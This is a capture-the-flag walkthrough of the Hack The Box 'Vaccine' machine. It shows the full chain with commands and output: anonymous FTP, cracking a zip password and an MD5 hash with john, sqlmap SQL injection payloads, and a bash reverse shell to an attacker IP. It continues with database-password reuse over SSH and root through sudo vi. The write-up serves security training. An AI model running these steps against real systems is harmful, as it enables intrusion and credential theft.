Vaccine
Port recognition withnmapor you can use recon
┌──(root@ghost)-[/home/ghost]
└─# recon vaccine.htb
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-23 12:33 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:33
Completed NSE at 12:33, 0.00s elapsed
Initiating Ping Scan at 12:33
Scanning vaccine.htb (10.129.202.213) [4 ports]
Completed Ping Scan at 12:33, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:33
Scanning vaccine.htb (10.129.202.213) [65535 ports]
Discovered open port 22/tcp on 10.129.202.213
Discovered open port 80/tcp on 10.129.202.213
Discovered open port 21/tcp on 10.129.202.213
Completed SYN Stealth Scan at 12:33, 16.78s elapsed (65535 total ports)
NSE: Script scanning 10.129.202.213.
Initiating NSE at 12:33
Completed NSE at 12:33, 0.55s elapsed
Nmap scan report for vaccine.htb (10.129.202.213)
Host is up (0.078s latency).
Not shown: 64067 closed tcp ports (reset), 1465 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x 1 0 0 2533 Apr 13 2021 backup.zip
22/tcp open ssh
80/tcp open http
NSE: Script Post-scanning.
Initiating NSE at 12:33
Completed NSE at 12:33, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 17.81 seconds
Raw packets sent: 83105 (3.657MB) | Rcvd: 71468 (2.859MB)
┌─[+] [ftp]
└─(Credentials for ftp vaccine.htb:21)
[user:ftp][password:]
[user:anonymous][password:]
[+] [fuzzin server]
http://vaccine.htb [200 OK] Apache[2.4.41], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.202.213], PasswordField[password], Title[MegaCorp Login]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Jul 23 12:33:57 2022
URL_BASE: http://vaccine.htb:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://vaccine.htb:80/ ----
+ http://vaccine.htb:80/index.php (CODE:200|SIZE:2312)
+ http://vaccine.htb:80/server-status (CODE:403|SIZE:276)
-----------------
END_TIME: Sat Jul 23 12:40:29 2022
DOWNLOADED: 4612 - FOUND: 2
recon reports three open ports 21 for ftp, 22 for ssh and 80 for webservice, additionally recon drops useful ftp information
┌──(root@ghost)-[/home/ghost]
└─# ftp vaccine.htb 21
Connected to vaccine.htb.
220 (vsFTPd 3.0.3)
Name (vaccine.htb:ghost): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get backup.zip
local: backup.zip remote: backup.zip
229 Entering Extended Passive Mode (|||10164|)
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
100% |******************************************************************************************************************************************************| 2533 2.53 MiB/s 00:00 ETA
226 Transfer complete.
2533 bytes received in 00:00 (33.55 KiB/s)
ftp> exit
221 Goodbye.
We have a protected password zipped backup
┌──(root@ghost)-[/home/ghost]
└─# zip2john backup.zip > hash
ver 2.0 efh 5455 efh 7875 backup.zip/index.php PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/style.css PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
┌──(root@ghost)-[/home/ghost]
└─# john --wordlist=rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963 (backup.zip)
1g 0:00:00:00 DONE (2022-07-23 12:45) 50.00g/s 44800p/s 44800c/s 44800C/s michelle1..ilovegod
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now we have password of the zip file
┌──(root@ghost)-[/home/ghost]
└─# unzip backup.zip
Archive: backup.zip
[backup.zip] index.php password:
inflating: index.php
inflating: style.css
┌──(root@ghost)-[/home/ghost]
└─# cat index.php
<!DOCTYPE html>
<?php
session_start();
if(isset($_POST['username']) && isset($_POST['password'])) {
if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
$_SESSION['login'] = "true";
header("Location: dashboard.php");
}
}
?>
...
Interesting information if username equal admin and some md5 hash 2cb42f8734ea607eefed3b70af13bbd3 equal something seems we can get in
┌──(root@ghost)-[/home/ghost]
└─# john --format=RAW-MD5 --wordlist=rockyou.txt hash2
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
qwerty789 (?)
1g 0:00:00:00 DONE (2022-07-23 12:55) 25.00g/s 2505Kp/s 2505Kc/s 2505KC/s shunda..pogimo
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
So we guess if we are admin with password qwerty789 we can log in http://vaccine.htb
We are logged in website time to inspect elements in there
┌──(root@ghost)-[/home/ghost]
└─# sqlmap -u "http://vaccine.htb/dashboard.php?search=Meta" --os-shell --cookie="PHPSESSID=nh62gaptfomsptun0sgqa907eo" --level 5 --risk 3
___
__H__
___ ___[(]_____ ___ ___ {1.6.6#stable}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:15:33 /2022-07-23/
[13:15:33] [INFO] testing connection to the target URL
[13:15:34] [INFO] testing if the target URL content is stable
[13:15:34] [INFO] target URL content is stable
[13:15:34] [INFO] testing if GET parameter 'search' is dynamic
[13:15:34] [INFO] GET parameter 'search' appears to be dynamic
[13:15:34] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[13:15:34] [INFO] heuristic (XSS) test shows that GET parameter 'search' might be vulnerable to cross-site scripting (XSS) attacks
[13:15:34] [INFO] testing for SQL injection on GET parameter 'search'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
[13:15:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:15:41] [INFO] GET parameter 'search' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="SUV")
[13:15:41] [INFO] testing 'Generic inline queries'
[13:15:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:15:41] [INFO] GET parameter 'search' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
[13:15:41] [INFO] testing 'PostgreSQL inline queries'
[13:15:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[13:15:41] [WARNING] time-based comparison requires larger statistical model, please wait................... (done)
[13:16:06] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
[13:16:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[13:16:16] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable
[13:16:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:16:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[13:16:16] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[13:16:16] [WARNING] reflective value(s) found and filtering out
[13:16:17] [INFO] target URL appears to have 5 columns in query
[13:16:17] [INFO] GET parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 43 HTTP(s) requests:
---
Parameter: search (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: search=Meta' AND 3965=3965-- GKOe
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: search=Meta' AND 1147=CAST((CHR(113)||CHR(113)||CHR(112)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (1147=1147) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC)-- BFtu
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: search=Meta';SELECT PG_SLEEP(5)--
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: search=Meta' AND 4697=(SELECT 4697 FROM PG_SLEEP(5))-- QCgq
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: search=Meta' UNION ALL SELECT NULL,NULL,NULL,NULL,(CHR(113)||CHR(113)||CHR(112)||CHR(107)||CHR(113))||(CHR(65)||CHR(89)||CHR(109)||CHR(72)||CHR(82)||CHR(107)||CHR(99)||CHR(118)||CHR(119)||CHR(65)||CHR(85)||CHR(110)||CHR(87)||CHR(118)||CHR(71)||CHR(90)||CHR(83)||CHR(122)||CHR(116)||CHR(65)||CHR(102)||CHR(103)||CHR(114)||CHR(120)||CHR(71)||CHR(103)||CHR(116)||CHR(110)||CHR(79)||CHR(89)||CHR(120)||CHR(71)||CHR(108)||CHR(84)||CHR(97)||CHR(121)||CHR(75)||CHR(108)||CHR(121)||CHR(119))||(CHR(113)||CHR(98)||CHR(113)||CHR(107)||CHR(113))-- qdkg
---
[13:16:27] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[13:16:27] [INFO] fingerprinting the back-end DBMS operating system
[13:16:28] [INFO] the back-end DBMS operating system is Linux
[13:16:28] [INFO] testing if current user is DBA
[13:16:28] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[13:16:28] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> bash -c "bash -i >& /dev/tcp/10.10.14.224/1337 0>&1"
After setting up sqlmap with our admin cookie PHPSESSID:nh62gaptfomsptun0sgqa907eo and upgrading our shell to a linux one because --os-shell limitations
┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
connect to [10.10.14.224] from vaccine.htb [10.129.202.213] 60692
bash: cannot set terminal process group (2635): Inappropriate ioctl for device
bash: no job control in this shell
postgres@vaccine:/var/lib/postgresql/11/main$ cat ../../user.txt
cat ../../user.txt
ec9b13ca4d6229cd5cc1e09980965bf7
We have user flag
postgres@vaccine:/var/lib/postgresql/11/main$ cd /var/www/html
cd /var/www/html
postgres@vaccine:/var/www/html$ ls
ls
bg.png
dashboard.css
dashboard.js
dashboard.php
index.php
license.txt
style.css
postgres@vaccine:/var/www/html$ cat dashboard.php
cat dashboard.php
...
<?php
session_start();
if($_SESSION['login'] !== "true") {
header("Location: index.php");
die();
}
try {
$conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
}
...
postgres@vaccine:/var/www/html$
We found more credentials, let's try to use it in ssh
┌──(root@ghost)-[/home/ghost]
└─# ssh postgres@vaccine.htb
The authenticity of host 'vaccine.htb (10.129.202.213)' can't be established.
ED25519 key fingerprint is SHA256:4qLpMBLGtEbuHObR8YU15AGlIlpd0dsdiGh/pkeZYFo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'vaccine.htb' (ED25519) to the list of known hosts.
postgres@vaccine.htb's password:
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-64-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 23 Jul 2022 05:42:52 PM UTC
System load: 0.04 Processes: 188
Usage of /: 32.6% of 8.73GB Users logged in: 0
Memory usage: 31% IP address for ens160: 10.129.202.213
Swap usage: 0%
0 updates can be installed immediately.
0 of these updates are security updates.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
postgres@vaccine:~$ sudo -l
[sudo] password for postgres:
Matching Defaults entries for postgres on vaccine:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass
User postgres may run the following commands on vaccine:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
As we can see vi can run /etc/postgresql/11/main/pg_hba.conf as sudo
postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
# whoami
root
# cat /root/root.txt
dd6e058e814260bc70e9bbdef2715849